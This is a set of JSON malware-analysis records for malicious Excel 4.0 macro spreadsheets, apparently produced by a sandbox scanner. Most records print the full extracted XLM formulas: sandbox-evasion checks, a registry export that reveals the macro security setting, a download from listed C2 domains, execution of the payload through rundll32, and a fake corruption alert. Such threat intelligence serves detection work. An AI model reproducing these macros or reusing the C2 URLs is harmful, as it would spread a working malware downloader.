{"version":"0.2","sample":{"sample":"","kind":"file","target":"288e7ac561aee8134b30743da4cb7c1eedac825fcd77666c75a2b5e5013bcc41"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"288e7ac561aee8134b30743da4cb7c1eedac825fcd77666c75a2b5e5013bcc41","filesize":214528,"md5":"574dcd819a2990e0debd6517864809d8","sha1":"28b6687bcd705d5ef23a8cd09d5708625035bf43","sha256":"288e7ac561aee8134b30743da4cb7c1eedac825fcd77666c75a2b5e5013bcc41","sha512":"b68864318dde1c75ad40a019b0097b98b420edb4f50381e5379f80d8b26b2e42bf5a48381cf9bf96fceb87502637da060a3b9de5a101bd18b021ac8f782579c9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"288e7ac561aee8134b30743da4cb7c1eedac825fcd77666c75a2b5e5013bcc41.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LdBTNPzs01\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2890e486d7f9494be364afa9f0907a23bdf13fdcad5f72ae5b9c5d810a91da7e"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"2890e486d7f9494be364afa9f0907a23bdf13fdcad5f72ae5b9c5d810a91da7e","filesize":185344,"md5":"71e65e8a608dafbe42399948d9231c2f","sha1":"4467f002645af9a279d55120a715c42c289df2f2","sha256":"2890e486d7f9494be364afa9f0907a23bdf13fdcad5f72ae5b9c5d810a91da7e","sha512":"9542b28f454b0f39fe5edc7c6e207880de8623a55fecfa403d0f62d37ff830dfc9b35384bc0716ac1307e1b62ab0296a4e0bcb521809cb101df3fe4d29243c8c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2890e486d7f9494be364afa9f0907a23bdf13fdcad5f72ae5b9c5d810a91da7e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2892d381f08c281110a7958559fa270c5e0b542c44856b880817c0cc6d628bee"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"2892d381f08c281110a7958559fa270c5e0b542c44856b880817c0cc6d628bee","filesize":225280,"md5":"fd90b4ef4438002df768437086cb8001","sha1":"93eeb980fab52093010a440c5187184fe60a94d3","sha256":"2892d381f08c281110a7958559fa270c5e0b542c44856b880817c0cc6d628bee","sha512":"b399879190bfebe0bee7d322e5cd2aa1cbda5e5a8ea9a49fa312a18cc4f21d36e30fd9e96e9b9f419ef8991483b586e8f0c4cd085e887c9b1676d2f45ef95dc8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2892d381f08c281110a7958559fa270c5e0b542c44856b880817c0cc6d628bee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"URAll463fl\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"28a4017fe93b1821b0307385238cc0123c9194c3ac1ce5fb7a6a4850cb42661f"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"28a4017fe93b1821b0307385238cc0123c9194c3ac1ce5fb7a6a4850cb42661f","filesize":209920,"md5":"9659ec9f91f1e15e65bc1e987dae190f","sha1":"51ec360858bd6cd3ea808c7f1ff66ec098a05443","sha256":"28a4017fe93b1821b0307385238cc0123c9194c3ac1ce5fb7a6a4850cb42661f","sha512":"7e9b29655bd821649414b27cd38870f4f6c5adcda7e13d7b8cfab5bc4c8359f93029bf9aad32a80e544e5a258748eb47bf860b91ed030ec61b1cbbe1f4e11d1f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"28a4017fe93b1821b0307385238cc0123c9194c3ac1ce5fb7a6a4850cb42661f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ntRFFz80Lp\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"28d56e1439d71f6fdbb15b42a31cbdeee59ce09a991a38ba9416eb5114e1b1eb"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"28d56e1439d71f6fdbb15b42a31cbdeee59ce09a991a38ba9416eb5114e1b1eb","filesize":112128,"md5":"fa59592b8ccbfb449950aa96c0231a50","sha1":"c3b86ad2f1539f79fef75de238de1bcdea0d503c","sha256":"28d56e1439d71f6fdbb15b42a31cbdeee59ce09a991a38ba9416eb5114e1b1eb","sha512":"a336466c911dd43165bbd27a36ae1f783400077b09ad7a6066ed257cb659db6da853752821abe89aa92ae2971530915a74710f90eacbdfc6f8aa39e3441223ae","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"28d56e1439d71f6fdbb15b42a31cbdeee59ce09a991a38ba9416eb5114e1b1eb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"28d8ccb3e1b0eaef33da8a7b197bfd0bde7f88184e67f0fb0ced868a5b92a917"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"28d8ccb3e1b0eaef33da8a7b197bfd0bde7f88184e67f0fb0ced868a5b92a917","filesize":214016,"md5":"6ab127e4a0489dc85b8f18dba91bdd43","sha1":"e6d4818c1ba849c4c19a6bcf0e6609a2f5ddbc53","sha256":"28d8ccb3e1b0eaef33da8a7b197bfd0bde7f88184e67f0fb0ced868a5b92a917","sha512":"b999dc5bf294fd4e6f104fe690ff60d68396c83b15f1a1df9efc77f5bf0ae9151223f8f514768d95697425e3f10a67122fd313398a2395cfecbf7948b70c19bd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"28d8ccb3e1b0eaef33da8a7b197bfd0bde7f88184e67f0fb0ced868a5b92a917.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xumUgcRBln\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"28dd67cc6d7dd221983c5c8118e893c39ec0fffcb044f681ff6b145876c32209"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"28dd67cc6d7dd221983c5c8118e893c39ec0fffcb044f681ff6b145876c32209","filesize":185344,"md5":"1ca5e5f450a7f827f04a78c01f5b1136","sha1":"cd0960372d047cc19fa486eaab2e7fc5cd9d2f68","sha256":"28dd67cc6d7dd221983c5c8118e893c39ec0fffcb044f681ff6b145876c32209","sha512":"a465a2ca0fd27bd947cc89ccc6ae77451d51992c790db20110ddd91a41e74c3a75b1208f4b9e99724bfbc91ab853d55169330e708b06f1b3d0402a9577bec077","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"28dd67cc6d7dd221983c5c8118e893c39ec0fffcb044f681ff6b145876c32209.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"28dee4d94dd0a467a7dbeff45e6388351f199fb40a287a69852c8a035a0e682a"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"28dee4d94dd0a467a7dbeff45e6388351f199fb40a287a69852c8a035a0e682a","filesize":206336,"md5":"e6d325d8c582cf86a931ffe71308d8a7","sha1":"3e2299bde45d937a92704f1169425dea98dc8c19","sha256":"28dee4d94dd0a467a7dbeff45e6388351f199fb40a287a69852c8a035a0e682a","sha512":"81aed7919d8bd3227ff4e8552fbec9c49551a7b3c9c7b1dfdc3b463506a9cb8990dc7fdaecbb55361810836553259b9c93afdfddf67617025cc6875ae04447c9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"28dee4d94dd0a467a7dbeff45e6388351f199fb40a287a69852c8a035a0e682a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Zt4WtZC34W\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"28e38d8853a7f9727ea4ec2b3207a67ea26d31384f5221021cd08dc47a5040b3"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"28e38d8853a7f9727ea4ec2b3207a67ea26d31384f5221021cd08dc47a5040b3","filesize":185344,"md5":"d2edf6b8c08934955b79216a2ce9228e","sha1":"c77896675b97627e2d336514a7f4a884386217ed","sha256":"28e38d8853a7f9727ea4ec2b3207a67ea26d31384f5221021cd08dc47a5040b3","sha512":"09fe6c996c674c34cef452aac9a24dba3a4d1e874747b98bdda51fe14b5a956cbca02399849039f91049028ad4ec6cfff7af540996b27c20bde4a2a3dedad9e3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"28e38d8853a7f9727ea4ec2b3207a67ea26d31384f5221021cd08dc47a5040b3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"28ebe628c077579281312443c672380c8d529e6421f3c1353456c961dd1bc684"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"28ebe628c077579281312443c672380c8d529e6421f3c1353456c961dd1bc684","filesize":130048,"md5":"83c8086a814f02fac2bc9f9919bcd97c","sha1":"3639ebc75e632b9c388e585e7be461f6f4ce15cf","sha256":"28ebe628c077579281312443c672380c8d529e6421f3c1353456c961dd1bc684","sha512":"e583e5ea5bafe2c450e8107d0966f3d75f5b2b3dce69e448bd6c595de60ce4a8a12d6d24540239f1703f57d4dc90f7724ff6bdb3fa89261fd7e66ac6830be26d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"28ebe628c077579281312443c672380c8d529e6421f3c1353456c961dd1bc684.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://wgyafqtc.online/sgfbsb4"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://wgyafqtc.online/sgfbsb4\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nGOTO(R$0C$10)\nRETURN()\nWORKBOOK.HIDE(\"vAO6LJjGSN\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"28eda8241d39ab0e1af51425f8d37d9673c6cef06cb8af4acb84d84ef85a7b25"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"28eda8241d39ab0e1af51425f8d37d9673c6cef06cb8af4acb84d84ef85a7b25","filesize":185344,"md5":"21617d850e6936c86a78918737721506","sha1":"e9f4726fdd23209f89c31d1c8c0e4bf3c64b1f1f","sha256":"28eda8241d39ab0e1af51425f8d37d9673c6cef06cb8af4acb84d84ef85a7b25","sha512":"6fef37f4edded440f643220f7003164d4440fc53a21dbf2f553f9e49f9ef82f1868e36c9171d0180804388f408c59ae8ff62cee2864ec661aa6a0ccf97485adb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"28eda8241d39ab0e1af51425f8d37d9673c6cef06cb8af4acb84d84ef85a7b25.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"290569669ee62cea2b86c1e9a5f9cccacc99b2008c61e7e0ba467e75179cb536"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"290569669ee62cea2b86c1e9a5f9cccacc99b2008c61e7e0ba467e75179cb536","filesize":214016,"md5":"f3b01101d35e3c34b0d846a9f433c8a7","sha1":"c8d324a3ba797c0a91a3db8921ec5dd485746826","sha256":"290569669ee62cea2b86c1e9a5f9cccacc99b2008c61e7e0ba467e75179cb536","sha512":"06a14b65c1a5dfec5032e9913856084fd0a508c2eec7efad7ab52a7813c8e1b30e3f3a246a950611d8fac3a9cc91f8c6f8459fb6848cbcc2e1dd42fbd1eb225a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"290569669ee62cea2b86c1e9a5f9cccacc99b2008c61e7e0ba467e75179cb536.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4I83luDOUE\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"290c625cd7f4ae560009a35391e0b1401e69cb23a7d8c2a27173f07dcb7c7970"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"290c625cd7f4ae560009a35391e0b1401e69cb23a7d8c2a27173f07dcb7c7970","filesize":185344,"md5":"be6b546ed23ea205d606853ba4a2f6d1","sha1":"20e363b9042f6536d352ae83cdcc60bc900ac8a4","sha256":"290c625cd7f4ae560009a35391e0b1401e69cb23a7d8c2a27173f07dcb7c7970","sha512":"865e1728d12be42a680e3bfaf058eaf15178a4d187e91f4c36b78f142282f90a5229d6a6099b9feaf2667be51844debc15dfcdf31d922f01fe3dae3aa3a976a7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"290c625cd7f4ae560009a35391e0b1401e69cb23a7d8c2a27173f07dcb7c7970.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"292a4ed1a70d3aa395324409952ae01037631152ca7edecd267d470920e1cb3a"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"292a4ed1a70d3aa395324409952ae01037631152ca7edecd267d470920e1cb3a","filesize":214016,"md5":"2e0fcc3ab69d240fa637ce29f917eb8d","sha1":"606a8f61c0a11901b854e519df76c7f13ba28b5e","sha256":"292a4ed1a70d3aa395324409952ae01037631152ca7edecd267d470920e1cb3a","sha512":"acc498dc536c2f6391c7f460ac9a92da86af650d1bcabbfbc105c06e29590cfd32d0bb742c1694455bf93af765fed43aad1edb37fa5ce54d50727fb6673e55ab","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"292a4ed1a70d3aa395324409952ae01037631152ca7edecd267d470920e1cb3a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dFghb8vFow\",TRUE)\nGOTO(R$0C$18)"}}}]}
